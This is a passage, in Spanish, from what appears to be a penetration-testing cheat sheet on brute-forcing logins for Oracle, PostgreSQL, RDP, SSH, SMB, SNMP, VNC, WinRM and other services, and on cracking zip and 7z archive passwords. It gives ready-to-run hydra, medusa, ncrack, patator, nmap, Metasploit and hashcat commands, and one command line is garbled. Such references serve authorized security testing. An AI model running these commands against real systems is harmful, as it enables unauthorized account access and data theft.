DBMS_OUTPUT.PUT_LINE('Contraseña no encontrada');
END;
/
En este ejemplo, se realiza un bucle que prueba todas las combinaciones posibles de contraseñas, desde "password1" hasta "password10000". Si se encuentra la contraseña correcta, se muestra un mensaje indicando que se ha encontrado. Si no se encuentra ninguna contraseña, se muestra un mensaje indicando que no se ha encontrado.
Es importante tener en cuenta que la fuerza bruta es una técnica que puede ser ilegal si se utiliza sin el consentimiento del propietario del sistema o la información. Siempre es recomendable obtener permiso antes de realizar cualquier tipo de prueba de penetración o hacking ético.
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
./odat.py passwordguesser -s $SERVER -d $SID
./odat.py passwordguesser -s $MYSERVER -p $PORT --accounts-file accounts_multiple.txt
#msf1
msf> use admin/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORT 1521
msf> set SID <SID>
#msf2, this option uses nmap and it fails sometimes for some reason
msf> use scanner/oracle/oracle_login
msf> set RHOSTS <IP>
msf> set RPORTS 1521
msf> set SID <SID>
#for some reason nmap fails sometimes when executing this script
nmap --script oracle-brute -p 1521 --script-args oracle-brute.sid=<SID> <IP>
Para utilizar oracle_login con patator, necesitas instalar:
pip3 install cx_Oracle --upgrade
Fuerza bruta de hash de OracleSQL sin conexión (versiones 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2, y 11.2.0.3):
nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30
Fuerza Bruta
La fuerza bruta es una técnica de hacking que implica probar todas las posibles combinaciones de contraseñas hasta encontrar la correcta. Es un enfoque simple pero efectivo para obtener acceso no autorizado a sistemas protegidos por contraseña.
Metodología
La metodología de fuerza bruta generalmente sigue estos pasos:
-
Recopilación de información: El primer paso es recopilar información sobre el objetivo, como nombres de usuario, direcciones de correo electrónico, nombres de dominio, etc. Esta información puede ser obtenida a través de fuentes públicas o mediante técnicas de ingeniería social.
-
Selección de herramientas: A continuación, se selecciona una herramienta de fuerza bruta adecuada para el objetivo. Hay varias herramientas disponibles que automatizan el proceso de prueba de contraseñas.
-
Configuración de parámetros: Se configuran los parámetros de la herramienta, como el diccionario de contraseñas a utilizar, el número máximo de intentos permitidos, el tiempo de espera entre intentos, etc.
-
Ejecución de la herramienta: Una vez que se han configurado los parámetros, se ejecuta la herramienta de fuerza bruta para probar todas las combinaciones posibles de contraseñas.
-
Análisis de resultados: Después de que la herramienta haya terminado de probar todas las combinaciones, se analizan los resultados para identificar la contraseña correcta. Esto puede implicar revisar los registros de la herramienta o buscar señales de éxito, como mensajes de error específicos.
-
Acceso no autorizado: Una vez que se ha encontrado la contraseña correcta, se utiliza para obtener acceso no autorizado al sistema objetivo. Esto puede permitir al hacker robar información confidencial, realizar modificaciones no autorizadas o llevar a cabo otros ataques.
Recursos
Existen varios recursos disponibles para llevar a cabo ataques de fuerza bruta, como:
-
Diccionarios de contraseñas: Estos son archivos que contienen una lista de posibles contraseñas que se probarán durante el ataque de fuerza bruta. Pueden ser generados por el hacker o descargados de fuentes públicas.
-
Herramientas de fuerza bruta: Hay varias herramientas disponibles que automatizan el proceso de prueba de contraseñas, como Hydra, Medusa y John the Ripper.
-
Servicios en la nube: Algunos servicios en la nube, como AWS y GCP, ofrecen servicios de cómputo escalables que pueden ser utilizados para realizar ataques de fuerza bruta de manera más eficiente.
Es importante tener en cuenta que la fuerza bruta es una técnica ilegal y no ética, a menos que se realice con el consentimiento explícito del propietario del sistema objetivo para fines de prueba de penetración.
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V
PostgreSQL
PostgreSQL es un sistema de gestión de bases de datos relacional de código abierto y altamente escalable. Es ampliamente utilizado en aplicaciones web y empresariales debido a su capacidad para manejar grandes volúmenes de datos y su soporte para consultas complejas.
Una técnica común utilizada en el hacking es el ataque de fuerza bruta, que consiste en probar todas las combinaciones posibles de contraseñas hasta encontrar la correcta. Esto se puede hacer utilizando herramientas como Hydra o Medusa, que automatizan el proceso de prueba de contraseñas.
Sin embargo, es importante tener en cuenta que el uso de fuerza bruta para acceder a sistemas o cuentas sin autorización es ilegal y está sujeto a sanciones legales. Por lo tanto, siempre es recomendable obtener permiso explícito antes de realizar cualquier tipo de prueba de penetración o hacking ético.
Además, es importante tener en cuenta que la fuerza bruta puede ser un método ineficiente y lento, especialmente si la contraseña objetivo es larga y compleja. En muchos casos, es más efectivo utilizar otras técnicas de hacking, como la ingeniería social o la explotación de vulnerabilidades conocidas.
En resumen, PostgreSQL es una poderosa base de datos relacional, pero es importante utilizarla de manera ética y legal. La fuerza bruta es una técnica de hacking común, pero debe usarse con precaución y solo con permiso explícito.
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> postgres
medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M postgres
ncrack –v –U /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP>:5432
patator pgsql_login host=<IP> user=FILE0 0=/root/Desktop/user.txt password=FILE1 1=/root/Desktop/pass.txt
use auxiliary/scanner/postgres/postgres_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
PPTP
Puedes descargar el paquete .deb
para instalar desde https://http.kali.org/pool/main/t/thc-pptp-bruter/
sudo dpkg -i thc-pptp-bruter*.deb #Install the package
cat rockyou.txt | thc-pptp-bruter –u <Username> <IP>
RDP
El Protocolo de Escritorio Remoto (RDP, por sus siglas en inglés) es un protocolo de red desarrollado por Microsoft que permite a los usuarios controlar y acceder a un equipo remoto a través de una conexión de red. RDP utiliza el puerto 3389 por defecto y es ampliamente utilizado para la administración remota de sistemas Windows.
Ataques de fuerza bruta contra RDP
Los ataques de fuerza bruta contra RDP son una técnica común utilizada por los hackers para intentar adivinar las credenciales de inicio de sesión de un sistema remoto. Consiste en probar diferentes combinaciones de nombres de usuario y contraseñas hasta encontrar las correctas.
Existen varias herramientas disponibles que automatizan este proceso, como Hydra, Medusa y Ncrack. Estas herramientas pueden probar miles de combinaciones por segundo, lo que las hace muy efectivas para romper contraseñas débiles.
Para protegerse contra los ataques de fuerza bruta en RDP, se recomienda seguir las siguientes medidas de seguridad:
- Utilizar contraseñas fuertes y únicas para las cuentas de usuario.
- Implementar bloqueo de cuenta después de un número determinado de intentos fallidos.
- Configurar una política de contraseña que requiera contraseñas complejas.
- Utilizar una solución de autenticación de dos factores para agregar una capa adicional de seguridad.
Además, es importante mantener el sistema operativo y las aplicaciones actualizadas para evitar vulnerabilidades conocidas que podrían ser explotadas por los atacantes.
ncrack -vv --user <User> -P pwds.txt rdp://<IP>
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
Fuerza bruta
La fuerza bruta es una técnica comúnmente utilizada en el hacking para descifrar contraseñas o claves de cifrado mediante la prueba exhaustiva de todas las posibles combinaciones. En el contexto de Redis, la fuerza bruta se puede utilizar para intentar adivinar contraseñas de acceso a una instancia de Redis.
Herramientas de fuerza bruta
Existen varias herramientas disponibles para llevar a cabo ataques de fuerza bruta en Redis. Algunas de las herramientas más populares incluyen:
- Hydra: una herramienta de fuerza bruta muy conocida y ampliamente utilizada que admite múltiples protocolos, incluido Redis.
- Medusa: otra herramienta de fuerza bruta que puede utilizarse para atacar contraseñas de Redis.
- Ncrack: una herramienta de autenticación en red que también puede utilizarse para realizar ataques de fuerza bruta en Redis.
Métodos de protección contra ataques de fuerza bruta
Para proteger una instancia de Redis contra ataques de fuerza bruta, se pueden implementar las siguientes medidas:
- Contraseñas fuertes: utilizar contraseñas largas y complejas dificulta enormemente los ataques de fuerza bruta.
- Bloqueo de IP: configurar Redis para bloquear automáticamente las direcciones IP después de un número determinado de intentos fallidos de autenticación.
- Limitación de intentos: implementar un mecanismo que limite el número de intentos de autenticación permitidos en un período de tiempo determinado.
- Autenticación adicional: utilizar mecanismos de autenticación adicionales, como el uso de claves SSH o certificados SSL/TLS, para agregar una capa adicional de seguridad.
Es importante tener en cuenta que ninguna medida de protección es infalible y siempre existe la posibilidad de que un ataque de fuerza bruta tenga éxito. Por lo tanto, es fundamental mantenerse actualizado sobre las últimas vulnerabilidades y parches de seguridad, así como implementar medidas de seguridad adicionales, como el monitoreo de registros y la detección de intrusiones, para detectar y mitigar posibles ataques.
msf> use auxiliary/scanner/redis/redis_login
nmap --script redis-brute -p 6379 <IP>
hydra –P /path/pass.txt redis://<IP>:<PORT> # 6379 is the default
Rexec
Rexec, también conocido como Remote Execution Service, es un protocolo de red que permite a un usuario ejecutar comandos en un sistema remoto. Este protocolo se utiliza comúnmente en entornos de red para administrar sistemas y realizar tareas de administración remota.
El ataque de fuerza bruta en Rexec implica intentar adivinar las credenciales de inicio de sesión de un sistema remoto mediante la prueba de diferentes combinaciones de nombres de usuario y contraseñas. Este método es efectivo cuando se utilizan credenciales débiles o cuando no se han implementado medidas de seguridad adecuadas.
Para llevar a cabo un ataque de fuerza bruta en Rexec, se utilizan herramientas como Hydra o Medusa, que automatizan el proceso de prueba de credenciales. Estas herramientas intentan diferentes combinaciones de nombres de usuario y contraseñas hasta encontrar las correctas.
Es importante tener en cuenta que realizar un ataque de fuerza bruta en Rexec sin el consentimiento explícito del propietario del sistema es ilegal y está sujeto a sanciones legales. Este tipo de ataque solo debe realizarse como parte de una evaluación de seguridad autorizada, como una prueba de penetración.
hydra -l <username> -P <password_file> rexec://<Victim-IP> -v -V
Rlogin
Rlogin (Remote Login) es un protocolo de red que permite a un usuario iniciar sesión en un sistema remoto a través de una red. Este protocolo utiliza el puerto 513 y se basa en la autenticación mediante contraseña.
El ataque de fuerza bruta en Rlogin implica intentar adivinar la contraseña correcta probando diferentes combinaciones de contraseñas hasta encontrar la correcta. Este tipo de ataque puede ser automatizado utilizando herramientas como Hydra o Medusa.
Es importante tener en cuenta que el uso de fuerza bruta para acceder a sistemas remotos sin autorización es ilegal y está sujeto a sanciones legales. Solo se debe realizar este tipo de ataque con el permiso explícito del propietario del sistema y como parte de una evaluación de seguridad autorizada, como una prueba de penetración.
hydra -l <username> -P <password_file> rlogin://<Victim-IP> -v -V
Rsh
El Rsh (Remote Shell) es un protocolo de red que permite a un usuario ejecutar comandos en un sistema remoto. Es similar al comando ssh
, pero sin la autenticación segura. El Rsh utiliza un enfoque de fuerza bruta para adivinar las credenciales de inicio de sesión del sistema remoto.
La técnica de fuerza bruta consiste en probar todas las combinaciones posibles de contraseñas hasta encontrar la correcta. Esto se logra mediante el uso de herramientas automatizadas que generan contraseñas y las prueban una por una. El proceso puede llevar mucho tiempo, ya que implica probar una gran cantidad de combinaciones.
El Rsh es una técnica de hacking que puede ser utilizada por atacantes para obtener acceso no autorizado a sistemas remotos. Es importante tener en cuenta que el uso de esta técnica es ilegal y puede tener graves consecuencias legales.
Para protegerse contra ataques de fuerza bruta como el Rsh, es recomendable utilizar contraseñas seguras y complejas, así como implementar medidas de seguridad adicionales, como la autenticación de dos factores. Además, es importante mantener el software y los sistemas actualizados para evitar vulnerabilidades conocidas que podrían ser explotadas por los atacantes.
hydra -L <Username_list> rsh://<Victim_IP> -v -V
http://pentestmonkey.net/tools/misc/rsh-grind
Rsync
Rsync es una herramienta de sincronización de archivos que se utiliza comúnmente en sistemas Unix y Linux. Permite la transferencia eficiente de archivos y directorios entre sistemas locales y remotos. Rsync utiliza un algoritmo delta para transferir solo las partes modificadas de un archivo, lo que lo hace especialmente útil para sincronizar grandes cantidades de datos.
Sin embargo, Rsync también puede ser utilizado como una herramienta de fuerza bruta en el contexto de la piratería ética. La fuerza bruta es un método de ataque en el que se prueban todas las combinaciones posibles de contraseñas hasta encontrar la correcta. En el caso de Rsync, esto implica probar diferentes combinaciones de nombres de usuario y contraseñas para acceder a un sistema remoto.
Para llevar a cabo un ataque de fuerza bruta con Rsync, se pueden utilizar herramientas como "rsh-grind". Estas herramientas automatizan el proceso de prueba de contraseñas y pueden probar miles de combinaciones en poco tiempo. Sin embargo, es importante tener en cuenta que la fuerza bruta es un método intrusivo y puede ser ilegal si se realiza sin el consentimiento del propietario del sistema.
En resumen, Rsync es una herramienta de sincronización de archivos ampliamente utilizada, pero también puede ser utilizada como una herramienta de fuerza bruta en el contexto de la piratería ética.
nmap -sV --script rsync-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 873 <IP>
RTSP
El Protocolo de Transmisión en Tiempo Real (RTSP, por sus siglas en inglés) es un protocolo de red utilizado para controlar la transmisión de medios en tiempo real, como audio y video, a través de redes IP. RTSP permite la reproducción continua de medios y la interacción con el servidor de medios.
Ataques de fuerza bruta contra RTSP
Los ataques de fuerza bruta son una técnica común utilizada para intentar adivinar contraseñas o claves de acceso. En el caso de RTSP, un ataque de fuerza bruta implica intentar adivinar la contraseña de un servidor RTSP mediante la prueba de diferentes combinaciones de contraseñas.
Existen varias herramientas disponibles para llevar a cabo ataques de fuerza bruta contra servidores RTSP. Estas herramientas automatizan el proceso de prueba de contraseñas y pueden probar miles de combinaciones en poco tiempo.
Es importante tener en cuenta que los ataques de fuerza bruta son ilegales y están sujetos a sanciones legales. Solo se deben realizar ataques de fuerza bruta en sistemas y redes autorizadas, como parte de una evaluación de seguridad o una prueba de penetración.
hydra -l root -P passwords.txt <IP> rtsp
SNMP
El Protocolo Simple de Administración de Red (SNMP, por sus siglas en inglés) es un protocolo de red utilizado para administrar y supervisar dispositivos en una red. SNMP permite a los administradores de red recopilar información y controlar dispositivos de red, como routers, switches y servidores.
El protocolo SNMP utiliza una estructura de datos jerárquica llamada MIB (Base de Información de Administración) para organizar y almacenar información sobre los dispositivos de red. Los administradores pueden utilizar herramientas de gestión de red para acceder a la MIB y obtener información sobre el estado y el rendimiento de los dispositivos.
Una técnica común utilizada en el hacking es el ataque de fuerza bruta, que implica probar todas las combinaciones posibles de contraseñas hasta encontrar la correcta. Esto se puede aplicar al protocolo SNMP para intentar adivinar la cadena de comunidad, que es una especie de contraseña utilizada para autenticar y autorizar las solicitudes SNMP.
Los hackers pueden utilizar herramientas automatizadas para realizar ataques de fuerza bruta en el protocolo SNMP. Estas herramientas intentarán todas las combinaciones posibles de cadenas de comunidad hasta encontrar la correcta. Una vez que se ha adivinado la cadena de comunidad, el hacker puede obtener acceso no autorizado al dispositivo y realizar acciones maliciosas.
Para protegerse contra los ataques de fuerza bruta en SNMP, es importante utilizar cadenas de comunidad fuertes y únicas. Además, se deben implementar medidas de seguridad adicionales, como el filtrado de direcciones IP y la autenticación de usuarios, para evitar el acceso no autorizado a los dispositivos de red.
En resumen, SNMP es un protocolo utilizado para administrar y supervisar dispositivos de red. Sin embargo, puede ser vulnerable a ataques de fuerza bruta si no se implementan medidas de seguridad adecuadas. Los administradores de red deben tomar precauciones para proteger sus dispositivos contra estos ataques.
msf> use auxiliary/scanner/snmp/snmp_login
nmap -sU --script snmp-brute <target> [--script-args snmp-brute.communitiesdb=<wordlist> ]
onesixtyone -c /usr/share/metasploit-framework/data/wordlists/snmp_default_pass.txt <IP>
hydra -P /usr/share/seclists/Discovery/SNMP/common-snmp-community-strings.txt target.com snmp
SMB
SMB (Server Message Block) es un protocolo de red utilizado para compartir archivos, impresoras y otros recursos en una red local. Es comúnmente utilizado en entornos Windows y permite a los usuarios acceder y administrar recursos compartidos en una red.
El protocolo SMB también puede ser utilizado por los hackers como una vía para realizar ataques de fuerza bruta. Un ataque de fuerza bruta consiste en intentar todas las combinaciones posibles de contraseñas hasta encontrar la correcta. En el caso de SMB, un hacker puede utilizar herramientas automatizadas para intentar adivinar la contraseña de una cuenta de usuario o de un recurso compartido.
Para protegerse contra los ataques de fuerza bruta en SMB, es importante utilizar contraseñas fuertes y complejas, que sean difíciles de adivinar. Además, se recomienda implementar medidas de seguridad adicionales, como bloquear direcciones IP sospechosas o limitar el número de intentos de inicio de sesión fallidos.
En resumen, SMB es un protocolo de red utilizado para compartir recursos en una red local, pero también puede ser utilizado por hackers para realizar ataques de fuerza bruta. Es importante tomar medidas de seguridad para protegerse contra estos ataques.
nmap --script smb-brute -p 445 <IP>
hydra -l Administrator -P words.txt 192.168.1.12 smb -t 1
El protocolo SMTP (Simple Mail Transfer Protocol) es un protocolo de red utilizado para enviar correos electrónicos a través de Internet. SMTP es un protocolo de texto sin estado que se basa en el modelo cliente-servidor. El cliente SMTP se utiliza para enviar mensajes de correo electrónico al servidor SMTP, que luego se encarga de entregar el mensaje al destinatario.
Ataques de fuerza bruta contra SMTP
Un ataque de fuerza bruta contra SMTP es un método utilizado por los hackers para obtener acceso no autorizado a una cuenta de correo electrónico. En este tipo de ataque, el hacker intenta adivinar la contraseña correcta probando diferentes combinaciones de contraseñas hasta encontrar la correcta.
Existen varias herramientas y recursos disponibles para llevar a cabo un ataque de fuerza bruta contra SMTP. Estas herramientas automatizan el proceso de prueba de contraseñas y pueden probar miles de combinaciones en poco tiempo.
Protección contra ataques de fuerza bruta
Para protegerse contra los ataques de fuerza bruta contra SMTP, es importante seguir algunas prácticas recomendadas:
- Utilizar contraseñas fuertes: Las contraseñas deben ser largas, complejas y únicas para cada cuenta de correo electrónico.
- Implementar bloqueo de cuentas: Después de un número determinado de intentos fallidos de inicio de sesión, se debe bloquear la cuenta durante un período de tiempo para evitar ataques de fuerza bruta.
- Utilizar autenticación de dos factores: La autenticación de dos factores agrega una capa adicional de seguridad al requerir un segundo factor de autenticación, como un código enviado al teléfono móvil del usuario, además de la contraseña.
- Mantener el software actualizado: Es importante mantener el software de correo electrónico y los sistemas operativos actualizados para protegerse contra vulnerabilidades conocidas.
Al seguir estas prácticas recomendadas, se puede reducir significativamente el riesgo de un ataque de fuerza bruta contra SMTP y proteger la integridad de las cuentas de correo electrónico.
hydra -l <username> -P /path/to/passwords.txt <IP> smtp -V
hydra -l <username> -P /path/to/passwords.txt -s 587 <IP> -S -v -V #Port 587 for SMTP with SSL
SOCKS
SOCKS (Socket Secure) es un protocolo de red que permite a los usuarios enviar y recibir datos a través de un servidor proxy. A diferencia de otros protocolos de proxy, SOCKS no está diseñado para inspeccionar o filtrar el tráfico de red, sino que actúa como un intermediario entre el cliente y el servidor.
El uso de SOCKS es común en el ámbito de la seguridad informática, ya que permite a los usuarios ocultar su dirección IP real y enrutar su tráfico a través de un servidor proxy. Esto puede ser útil para eludir restricciones geográficas, acceder a contenido bloqueado o proteger la privacidad en línea.
Una técnica común utilizada en el hacking es el ataque de fuerza bruta, que consiste en probar todas las combinaciones posibles de contraseñas hasta encontrar la correcta. SOCKS puede ser utilizado en este tipo de ataques para ocultar la dirección IP del atacante y evitar ser detectado.
Es importante tener en cuenta que el uso de SOCKS para actividades ilegales o no autorizadas está estrictamente prohibido y puede tener consecuencias legales graves. Siempre es recomendable utilizar SOCKS de manera ética y legal, respetando la privacidad y los derechos de los demás.
nmap -vvv -sCV --script socks-brute --script-args userdb=users.txt,passdb=/usr/share/seclists/Passwords/xato-net-10-million-passwords-1000000.txt,unpwndb.timelimit=30m -p 1080 <IP>
SSH
SSH (Secure Shell) es un protocolo de red que permite a los usuarios acceder y administrar de forma segura un sistema remoto. Utiliza técnicas de cifrado para proteger la comunicación entre el cliente y el servidor, evitando así que los datos sean interceptados o modificados por terceros.
El ataque de fuerza bruta es una técnica comúnmente utilizada para intentar obtener acceso no autorizado a un sistema SSH. Consiste en probar diferentes combinaciones de nombres de usuario y contraseñas hasta encontrar las credenciales correctas. Los atacantes suelen utilizar diccionarios de contraseñas predefinidos o generados automáticamente para realizar este tipo de ataque.
Para protegerse contra los ataques de fuerza bruta en SSH, es importante seguir algunas buenas prácticas de seguridad. Estas incluyen:
- Utilizar contraseñas seguras y difíciles de adivinar.
- Configurar el servidor SSH para permitir solo conexiones desde direcciones IP específicas.
- Limitar el número de intentos de inicio de sesión fallidos antes de bloquear temporalmente la cuenta.
- Utilizar autenticación de dos factores para agregar una capa adicional de seguridad.
Además, es recomendable mantener el software SSH actualizado con las últimas correcciones de seguridad y monitorear los registros de actividad en busca de posibles intentos de acceso no autorizados.
En resumen, SSH es un protocolo seguro para acceder y administrar sistemas remotos, pero es importante tomar medidas para protegerse contra los ataques de fuerza bruta y mantener la seguridad de las credenciales de acceso.
hydra -l root -P passwords.txt [-t 32] <IP> ssh
ncrack -p 22 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M ssh
patator ssh_login host=<ip> port=22 user=root 0=/path/passwords.txt password=FILE0 -x ignore:mesg='Authentication failed'
Claves SSH débiles / PRNG predecible de Debian
Algunos sistemas tienen fallas conocidas en la semilla aleatoria utilizada para generar material criptográfico. Esto puede resultar en un espacio de claves dramáticamente reducido que puede ser sometido a fuerza bruta con herramientas como snowdroppe/ssh-keybrute. También están disponibles conjuntos pregenerados de claves débiles, como g0tmi1k/debian-ssh.
SQL Server
#Use the NetBIOS name of the machine as domain
crackmapexec mssql <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> mssql
medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M mssql
nmap -p 1433 --script ms-sql-brute --script-args mssql.domain=DOMAIN,userdb=customuser.txt,passdb=custompass.txt,ms-sql-brute.brute-windows-accounts <host> #Use domain if needed. Be careful with the number of passwords in the list, this could block accounts
msf> use auxiliary/scanner/mssql/mssql_login #Be careful, you can block accounts. If you have a domain set it and use USE_WINDOWS_ATHENT
Telnet
Telnet es un protocolo de red que permite la comunicación bidireccional entre dos dispositivos a través de una conexión TCP/IP. Es comúnmente utilizado para acceder y administrar dispositivos remotos, como servidores y enrutadores.
El ataque de fuerza bruta en Telnet implica intentar adivinar las credenciales de acceso al dispositivo objetivo probando diferentes combinaciones de nombres de usuario y contraseñas. Este método es efectivo cuando el dispositivo objetivo tiene credenciales débiles o predeterminadas.
Para llevar a cabo un ataque de fuerza bruta en Telnet, se utilizan herramientas como Hydra o Medusa, que automatizan el proceso de prueba de credenciales. Estas herramientas intentan diferentes combinaciones de nombres de usuario y contraseñas hasta encontrar las correctas.
Es importante tener en cuenta que el uso de fuerza bruta para acceder a dispositivos o sistemas sin autorización es ilegal y puede tener consecuencias legales graves. Solo se debe realizar un ataque de fuerza bruta en Telnet con el permiso explícito del propietario del dispositivo o sistema.
hydra -l root -P passwords.txt [-t 32] <IP> telnet
ncrack -p 23 --user root -P passwords.txt <IP> [-T 5]
medusa -u root -P 500-worst-passwords.txt -h <IP> -M telnet
VNC
VNC (Virtual Network Computing) es un protocolo que permite controlar de forma remota un ordenador a través de una red. Es ampliamente utilizado para acceder y administrar sistemas de forma remota.
Ataques de fuerza bruta contra VNC
Un ataque de fuerza bruta contra VNC implica intentar adivinar la contraseña de acceso al sistema mediante la prueba de diferentes combinaciones de contraseñas. Este tipo de ataque puede ser efectivo si la contraseña es débil o si no se han tomado medidas de seguridad adicionales.
Herramientas de fuerza bruta para VNC
Existen varias herramientas disponibles para llevar a cabo ataques de fuerza bruta contra VNC. Algunas de las herramientas más populares incluyen Hydra, Medusa y Ncrack. Estas herramientas automatizan el proceso de prueba de contraseñas y pueden probar miles de combinaciones en poco tiempo.
Mitigación de ataques de fuerza bruta contra VNC
Para mitigar los ataques de fuerza bruta contra VNC, se recomienda seguir las siguientes medidas de seguridad:
- Utilizar contraseñas fuertes y únicas para el acceso a VNC.
- Implementar medidas de bloqueo después de un número determinado de intentos fallidos de inicio de sesión.
- Utilizar una VPN para cifrar la conexión entre el cliente y el servidor VNC.
- Limitar el acceso a VNC solo a direcciones IP específicas o a través de una red privada virtual (VPN).
- Mantener el software VNC actualizado con las últimas correcciones de seguridad.
Al seguir estas medidas de seguridad, se puede reducir significativamente el riesgo de un ataque de fuerza bruta exitoso contra VNC.
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt -s <PORT> <IP> vnc
medusa -h <IP> –u root -P /root/Desktop/pass.txt –M vnc
ncrack -V --user root -P /root/Desktop/pass.txt <IP>:>POR>T
patator vnc_login host=<IP> password=FILE0 0=/root/Desktop/pass.txt –t 1 –x retry:fgep!='Authentication failure' --max-retries 0 –x quit:code=0
use auxiliary/scanner/vnc/vnc_login
nmap -sV --script pgsql-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 5432 <IP>
#Metasploit
use auxiliary/scanner/vnc/vnc_login
set RHOSTS <ip>
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/passwords.lst
Winrm
Winrm es un protocolo de administración remota desarrollado por Microsoft que permite a los administradores controlar y administrar sistemas Windows de forma remota. Winrm utiliza el protocolo SOAP (Simple Object Access Protocol) sobre HTTP o HTTPS para la comunicación entre el cliente y el servidor.
El ataque de fuerza bruta en Winrm implica intentar adivinar las credenciales de inicio de sesión de un sistema Windows utilizando un método de prueba y error. Esto se logra enviando múltiples combinaciones de nombres de usuario y contraseñas hasta que se encuentra una coincidencia exitosa.
Para llevar a cabo un ataque de fuerza bruta en Winrm, se pueden utilizar herramientas como Hydra o Medusa, que automatizan el proceso de envío de solicitudes de inicio de sesión con diferentes combinaciones de credenciales.
Es importante tener en cuenta que los ataques de fuerza bruta son ilegales y están estrictamente prohibidos sin el consentimiento explícito del propietario del sistema objetivo. Estos ataques pueden causar daños graves y violar la privacidad y seguridad de los sistemas y datos.
crackmapexec winrm <IP> -d <Domain Name> -u usernames.txt -p passwords.txt
Utilice Trickest para construir y automatizar fácilmente flujos de trabajo impulsados por las herramientas comunitarias más avanzadas del mundo.
Obtenga acceso hoy:
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
Local
Bases de datos de cracking en línea
http://hashtoolkit.com/reverse-hash?(MD5 y SHA1)- https://www.onlinehashcrack.com/ (Hashes, capturas WPA2 y archivos MSOffice, ZIP, PDF...)
- https://crackstation.net/ (Hashes)
- https://md5decrypt.net/ (MD5)
- https://gpuhash.me/ (Hashes y hashes de archivos)
- https://hashes.org/search.php (Hashes)
- https://www.cmd5.org/ (Hashes)
- https://hashkiller.co.uk/Cracker (MD5, NTLM, SHA1, MySQL5, SHA256, SHA512)
- https://www.md5online.org/md5-decrypt.html (MD5)
- http://reverse-hash-lookup.online-domain-tools.com/
Revise esto antes de intentar realizar un ataque de fuerza bruta a un Hash.
ZIP
#sudo apt-get install fcrackzip
fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' chall.zip
zip2john file.zip > zip.john
john zip.john
#$zip2$*0*3*0*a56cb83812be3981ce2a83c581e4bc4f*4d7b*24*9af41ff662c29dfff13229eefad9a9043df07f2550b9ad7dfc7601f1a9e789b5ca402468*694b6ebb6067308bedcd*$/zip2$
hashcat.exe -m 13600 -a 0 .\hashzip.txt .\wordlists\rockyou.txt
.\hashcat.exe -m 13600 -i -a 0 .\hashzip.txt #Incremental attack
Ataque de fuerza bruta con texto plano conocido en archivos zip
Necesitas conocer el texto plano (o parte del texto plano) de un archivo contenido dentro del zip encriptado. Puedes verificar los nombres de archivo y el tamaño de los archivos contenidos dentro de un zip encriptado ejecutando: 7z l encrypted.zip
Descarga bkcrack desde la página de lanzamientos.
# You need to create a zip file containing only the file that is inside the encrypted zip
zip plaintext.zip plaintext.file
./bkcrack -C <encrypted.zip> -c <plaintext.file> -P <plaintext.zip> -p <plaintext.file>
# Now wait, this should print a key such as 7b549874 ebc25ec5 7e465e18
# With that key you can create a new zip file with the content of encrypted.zip
# but with a different pass that you set (so you can decrypt it)
./bkcrack -C <encrypted.zip> -k 7b549874 ebc25ec5 7e465e18 -U unlocked.zip new_pwd
unzip unlocked.zip #User new_pwd as password
7z
El método de fuerza bruta se puede utilizar para descifrar contraseñas de archivos comprimidos en formato 7z. El formato 7z es conocido por su alta tasa de compresión y su capacidad para cifrar archivos con contraseñas.
Para llevar a cabo un ataque de fuerza bruta en un archivo 7z, se necesita una lista de posibles contraseñas. Esta lista puede ser generada utilizando diccionarios de contraseñas comunes, combinaciones de palabras o caracteres, o mediante el uso de herramientas de generación de contraseñas.
Una vez que se tiene la lista de contraseñas, se utiliza un programa de fuerza bruta para probar cada contraseña en el archivo 7z. El programa intentará todas las combinaciones posibles hasta encontrar la contraseña correcta.
Es importante tener en cuenta que el proceso de fuerza bruta puede llevar mucho tiempo, especialmente si el archivo 7z tiene una contraseña fuerte y larga. Además, algunos programas de fuerza bruta pueden ser detectados por sistemas de seguridad y bloqueados.
Para aumentar las posibilidades de éxito en un ataque de fuerza bruta en un archivo 7z, se pueden utilizar técnicas como la optimización de la lista de contraseñas, la utilización de hardware especializado o la distribución del ataque en múltiples sistemas.
Es fundamental recordar que el uso de la fuerza bruta para acceder a archivos 7z sin autorización es ilegal y puede tener consecuencias legales graves. Este método solo debe ser utilizado con fines legítimos, como pruebas de penetración autorizadas o recuperación de contraseñas olvidadas.
cat /usr/share/wordlists/rockyou.txt | 7za t backup.7z
#Download and install requirements for 7z2john
wget https://raw.githubusercontent.com/magnumripper/JohnTheRipper/bleeding-jumbo/run/7z2john.pl
apt-get install libcompress-raw-lzma-perl
./7z2john.pl file.7z > 7zhash.john
Fuerza bruta
La fuerza bruta es una técnica de hacking que implica probar todas las combinaciones posibles de contraseñas hasta encontrar la correcta. Es un enfoque simple pero efectivo para obtener acceso no autorizado a sistemas protegidos por contraseña.
La fuerza bruta se basa en la premisa de que, dado el tiempo suficiente, se puede probar cada posible combinación de caracteres hasta encontrar la contraseña correcta. Esto se logra utilizando programas automatizados que generan y prueban contraseñas en rápida sucesión.
